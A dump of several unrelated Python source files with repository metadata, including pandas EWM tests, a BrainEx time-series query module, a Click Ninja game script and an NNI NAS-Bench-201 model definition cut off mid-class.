def __init__(self, filename=None, version=None):
self._filename = filename
self._version = version
self._db = None
def __call__(self, cls):
upd = getattr(cls, 'update', None)
if upd:
u = upd
def wrap():
def upd_wrap(*args, **kwargs):
u(None)
return upd_wrap
upd = wrap()
self._db = PersistentOptions.WrappedDict(cls, self._filename, self._version, cls.defaults, upd)
db = self._db
class WrappedClass:
def __init__(self, *args, **kwargs):
self._db = db
self._def = cls.defaults
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, val):
self._db[key] = val
def keys(self):
return self._db.keys()
def reset(self):
self._db.reset()
def clean(self):
self._db.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
return self._db.gettersetter(key, fn_get_wrap=fn_get_wrap, fn_set_wrap=fn_set_wrap)
return WrappedClass
| 33.475452 | 143 | 0.542802 | 5,070 | 0.391355 | 0 | 0 | 1,364 | 0.105288 | 0 | 0 | 2,388 | 0.18433 |
c79d02fd3237e472a6910ab89fe822c176242e9f | 11,414 | py | Python | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
]
| 28,899 | 2016-10-13T03:32:12.000Z | 2022-03-31T21:39:05.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
]
| 31,004 | 2016-10-12T23:22:27.000Z | 2022-03-31T23:17:38.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
]
| 15,149 | 2016-10-13T03:21:31.000Z | 2022-03-31T18:46:47.000Z | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=5), name)(B)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
# GH 7898
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
empty = Series([], dtype=np.float64)
result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
tm.assert_series_equal(result, empty)
# check series of length 1
result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
Series([1.0])
)
tm.assert_series_equal(result, Series([np.NaN]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
A = Series(np.random.randn(50), index=np.arange(50))
A[:10] = np.NaN
msg = "other must be a DataFrame or Series"
# exception raised is Exception
with pytest.raises(ValueError, match=msg):
getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
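# Sketch of the adjusted weighting above: with alpha = 1/(1+com), the i-th
# valid observation gets weight (1 - alpha)**(-i), so dividing the weighted
# cumsum by the cumsum of weights (as in test_ewm_consistency_mean below)
# reproduces pandas' adjusted EWM mean.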
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
result = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
expected = (
x.multiply(weights).cumsum().divide(weights.cumsum()).fillna(method="ffill")
)
expected[
x.expanding().count() < (max(min_periods, 1) if min_periods else 1)
] = np.nan
tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
consistency_data, adjust, ignore_na, min_periods
):
x, is_constant, no_nans = consistency_data
com = 3.0
# check variance debiasing factors
var_unbiased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=False)
var_biased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=True)
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method="ffill")
cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.0] = np.nan
var_debiasing_factors_x = numerator / denominator
tm.assert_equal(var_unbiased_x, var_biased_x * var_debiasing_factors_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding(min_periods=min_periods).count()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.0
if not bias:
expected[count_x < 2] = np.nan
tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
# check that var(x) == std(x)^2
tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
cov_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if isinstance(x, Series):
var_x_plus_y = (
(x + x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.var(bias=bias)
)
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
var_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
cov_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
corr_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x, bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
std_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if bias:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_x_times_y = (
(x * x)
.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
)
.mean()
)
tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
| 34.173653 | 88 | 0.615297 | 0 | 0 | 0 | 0 | 9,779 | 0.856755 | 0 | 0 | 992 | 0.086911 |
c79e030266cfddaf92e93230023130a13241d6c0 | 6,895 | py | Python | brainex/query.py | ebuntel/BrainExTemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
]
| 1 | 2020-09-04T16:15:26.000Z | 2020-09-04T16:15:26.000Z | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
]
| null | null | null | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
]
| null | null | null |
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
          k: int = 1, ex_sameID: bool = False, overlap: float = 1.0, mode: str = 'genex'):
"""
:param q: query sequence
:param gc: Gcluster in which to query
:param loi: list of two integer values, specifying the query range, if set to None, is going to query all length
:param sc: spark context on which to run the query operation
:param k: integer, specifying to return top k matches
:param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence
:param overlap: float, how much overlapping between queries lookups
:param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
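
    Intended usage (sketch; the gquery/bfquery dispatch below is still a TODO):
        matches = query(q, gc, loi=[50, 100], sc=sc, k=5, mode='genex')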
"""
if mode == 'genex':
gquery()
elif mode == 'bf':
bfquery()
else:
raise Exception('Unsupported query mode: ' + mode)
def get_query_from_dict():
pass
def get_query_sequence_from_file(file: str):
resList = []
with open(file, 'r') as f:
for i, line in enumerate(f):
if not i:
features = list(map(lambda x: strip_function(x),
line.strip()[:-1].split(',')))
if line != "" and line != "\n":
data = remove_trailing_zeros(line.split(",")[:-1])
series_data = data[len(features):]
resList.append(series_data)
    if resList and len(resList[0]) == 0:
        return resList[1:]
    else:
        return resList
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
           k: int = 1, ex_sameID: bool = False, overlap: float = 1.0):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
:param file:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
def bfquery():
print()
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
def custom_query(query_sequences: list, loi: list, Gcluster_data: dict, k: int, input_list: list):
    """
    :param query_sequences: list of list: the list of sequences (or a single sequence) to be queried
    :param loi: list of two integers specifying the length range of interest
    :param Gcluster_data: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj;
                          the sequences in a cluster are all of the SAME length
    :param k: number of best matches to return
    :param input_list: the raw input time series as (id, data) key-value pairs
    :return: the best k matches per query. Again note they are all of the SAME length
    """
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data: dict, k, input_list: list):
    """
    :param query_sequence: the sequence to be queried
    :param loi: list of two integers specifying the length range of interest
    :param Gcluster_data: dict[key = representative, value = list of timeSeriesObj]
    :param k: number of best matches to return
    :param input_list: the raw input time series as (id, data) key-value pairs
    :return: the k most similar sequences from the best-matching cluster, or None
    """
    min_rprs = None  # the representative with the minimal distance to the query
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
print('min dist' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
| 33.634146 | 119 | 0.639014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,347 | 0.485424 |
c79e23eb5e67f7342ba09df2a42c01c2772ded3a | 4,161 | py | Python | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
]
| null | null | null | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
]
| 1 | 2021-12-13T03:48:08.000Z | 2021-12-13T04:58:36.000Z | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
]
| null | null | null | import sys
import time
from typing import List, Optional
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
class Color(Enum):
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
RESET = '\033[0m'
def colorize(s, color: Color):
# return color.value + s + Color.RESET.value
return "{}{}{}".format(color.value, s, Color.RESET.value)
def green(s):
return colorize(s, Color.GREEN)
def yellow(s):
return colorize(s, Color.YELLOW)
def red(s):
return colorize(s, Color.RED)
class ArbitrageOpportunity(Enum):
NONE = 0
BUY = 1
SELL = 2
def __str__(self):
return self.name
def get_complementary_trade(t: ArbitrageOpportunity):
assert (t != ArbitrageOpportunity.NONE)
return ArbitrageOpportunity.BUY if t == ArbitrageOpportunity.SELL else ArbitrageOpportunity.SELL
class Price:
def __init__(self, exchange, symbol, bid, ask):
self.exchange = exchange
self.symbol = symbol
self.bid = bid
self.ask = ask
def is_opportunity(self, other):
if self.bid > other.ask:
return ArbitrageOpportunity.BUY # buy from other exchange
if self.ask < other.bid:
return ArbitrageOpportunity.SELL # buy from this exchange
return ArbitrageOpportunity.NONE
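# Example (sketch): if this exchange bids 101 while the other asks 100, buying
# on the other exchange and selling on this one captures the spread -> BUY.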
def compare_prices(p1: Price, p2: Price):
return p1.is_opportunity(p2)
async def get_price(symbol, exchange) -> Optional[Price]:
orderbook = await exchange.fetch_order_book(symbol, 10)
bid = orderbook['bids'][0][0] if len(orderbook['bids']) > 0 else None
ask = orderbook['asks'][0][0] if len(orderbook['asks']) > 0 else None
# spread = (ask - bid) if (bid and ask) else None
# print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread})
if bid is None or ask is None:
return None
return Price(exchange, symbol, float(bid), float(ask))
async def main():
if len(sys.argv) < 3:
print("Usage: python {} <exchange id 1> <exchange id 2> ...".format(sys.argv[0]))
return
exchanges = []
try:
# initialize exchanges
tasks = []
for ex_id in sys.argv[1:]:
try:
ex = getattr(ccxt, ex_id)({'enableRateLimit': True}) # type: ccxt.Exchange
# ex.set_sandbox_mode(enabled=True)
except AttributeError:
print("{} is not supported".format(ex_id))
return
except ccxt.NotSupported:
print("{} paper trading is not supported".format(ex_id))
return
tasks.append(asyncio.create_task(ex.load_markets()))
exchanges.append(ex)
[await t for t in tasks]
all_symbols = [symbol for ex in exchanges for symbol in ex.symbols]
unique_arbitrable_symbols = set([symbol for symbol in all_symbols if all_symbols.count(symbol) > 1])
for symbol in unique_arbitrable_symbols:
tasks = []
for ex in exchanges:
tasks.append(asyncio.create_task(get_price(symbol, ex)))
[await t for t in tasks]
            prices = [p for p in (t.result() for t in tasks) if p is not None]
if len(prices) > 1:
arbitrage_pairs = itertools.combinations(prices, r=2)
for p in arbitrage_pairs:
opportunity = compare_prices(p[0], p[1])
if opportunity != ArbitrageOpportunity.NONE:
print(green("{}: {} from {}, {} from {}".format(symbol, opportunity, p[1].exchange.id,
get_complementary_trade(opportunity),
p[0].exchange.id)))
else:
print(yellow(symbol))
# close all connections on KeyboardInterrupts and errors
finally:
[await ex.close() for ex in exchanges]
if __name__ == '__main__':
asyncio.run(main())
| 30.152174 | 111 | 0.564768 | 713 | 0.171353 | 0 | 0 | 0 | 0 | 2,598 | 0.624369 | 609 | 0.146359 |
c79ee6a1b6ebeba170b33fbfe523726f9f206dbb | 1,497 | py | Python | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
]
| null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
]
| null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
]
| null | null | null | WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
def destroy(s):
sound('swoosh')
if s.name == 'taco':
score(50)
else:
score(5)
# draw a splatting image at the center position of the image
image('redsplat', center=s.event_pos, size=2).fade(1.0)
s.fade(0.25)
def failure(s):
score(-20)
if s.name == 'bomb':
s.destroy()
image('explode', center=s.center, size=10).pulse(0.05)
if s.name == 'bomb' or score() < 0:
sound('scream')
text('You Survived %s seconds' % time(), MAROON)
callback(gameover, 0.01)
def spawn():
speed = randint(2, 10)
size = randint(1,4)
target = choice(['bananas', 'cherries',
'olives', 'ham', 'hotdog',
'fries','icee', 'pizza'])
if randint(1, 4) == 2:
target = 'bomb'
if randint(1, 10) == 5:
target = 'taco'
sound('launch')
arc = rand_arc()
s = image(target, arc[0], size=size)
if target == 'bomb':
s.speed(speed).spin(1).clicked(failure)
s.move_to(arc[1], arc[2], callback = s.destroy)
elif target == 'taco':
s.speed(5).spin().clicked(destroy)
s.move_to((-10, -2), (-5, HEIGHT/2), (WIDTH+1, HEIGHT/2), callback = s.destroy)
else:
s.speed(speed).clicked(destroy)
s.move_to(arc[1], arc[2], callback = lambda: failure(s))
callback(spawn, rand(0.1, 3))
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| 24.145161 | 86 | 0.549766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 253 | 0.169005 |
c79f981e96642b4e8be1f381e054bf741fdc029f | 7,166 | py | Python | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
]
| 2,305 | 2018-09-07T12:42:26.000Z | 2019-05-06T20:14:24.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
]
| 379 | 2018-09-10T10:19:50.000Z | 2019-05-06T18:04:46.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
]
| 314 | 2018-09-08T05:36:08.000Z | 2019-05-06T08:48:51.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(C_out)
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out),
)
def forward(self, x):
return self.op(x)
class Pooling(nn.Module):
def __init__(self, C_in, C_out, stride, mode):
super(Pooling, self).__init__()
if C_in == C_out:
self.preprocess = None
else:
self.preprocess = ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
if mode == 'avg':
self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
elif mode == 'max':
self.op = nn.MaxPool2d(3, stride=stride, padding=1)
else:
raise ValueError('Invalid mode={:} in Pooling'.format(mode))
def forward(self, x):
if self.preprocess:
x = self.preprocess(x)
return self.op(x)
class Zero(nn.Module):
def __init__(self, C_in, C_out, stride):
super(Zero, self).__init__()
self.C_in = C_in
self.C_out = C_out
self.stride = stride
self.is_zero = True
def forward(self, x):
if self.C_in == self.C_out:
if self.stride == 1:
return x.mul(0.)
else:
return x[:, :, ::self.stride, ::self.stride].mul(0.)
else:
shape = list(x.shape)
shape[1] = self.C_out
zeros = x.new_zeros(shape, dtype=x.dtype, device=x.device)
return zeros
class FactorizedReduce(nn.Module):
def __init__(self, C_in, C_out, stride):
super(FactorizedReduce, self).__init__()
self.stride = stride
self.C_in = C_in
self.C_out = C_out
self.relu = nn.ReLU(inplace=False)
if stride == 2:
C_outs = [C_out // 2, C_out - C_out // 2]
self.convs = nn.ModuleList()
for i in range(2):
self.convs.append(nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False))
self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
else:
raise ValueError('Invalid stride : {:}'.format(stride))
self.bn = nn.BatchNorm2d(C_out)
def forward(self, x):
x = self.relu(x)
y = self.pad(x)
out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
class ResNetBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride):
super(ResNetBasicblock, self).__init__()
assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
if stride == 2:
self.downsample = nn.Sequential(
nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
elif inplanes != planes:
self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
else:
self.downsample = None
self.in_dim = inplanes
self.out_dim = planes
self.stride = stride
self.num_conv = 2
def forward(self, inputs):
basicblock = self.conv_a(inputs)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
inputs = self.downsample(inputs) # residual
return inputs + basicblock
@model_wrapper
class NasBench201(nn.Module):
"""The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.
It's a stack of :class:`NasBench201Cell`.
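
    Example (sketch; under NNI Retiarii this class defines a *model space*
    to be explored by a search strategy, not a single fixed network)::

        model_space = NasBench201(stem_out_channels=16, num_modules_per_stack=5)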
"""
def __init__(self,
stem_out_channels: int = 16,
num_modules_per_stack: int = 5,
num_labels: int = 10):
super().__init__()
self.channels = C = stem_out_channels
self.num_modules = N = num_modules_per_stack
self.num_labels = num_labels
self.stem = nn.Sequential(
nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(C)
)
layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
C_prev = C
self.cells = nn.ModuleList()
for C_curr, reduction in zip(layer_channels, layer_reductions):
if reduction:
cell = ResNetBasicblock(C_prev, C_curr, 2)
else:
ops: Dict[str, Callable[[int, int], nn.Module]] = {
prim: lambda C_in, C_out: OPS_WITH_STRIDE[prim](C_in, C_out, 1) for prim in PRIMITIVES
}
cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
self.cells.append(cell)
C_prev = C_curr
self.lastact = nn.Sequential(
nn.BatchNorm2d(C_prev),
nn.ReLU(inplace=True)
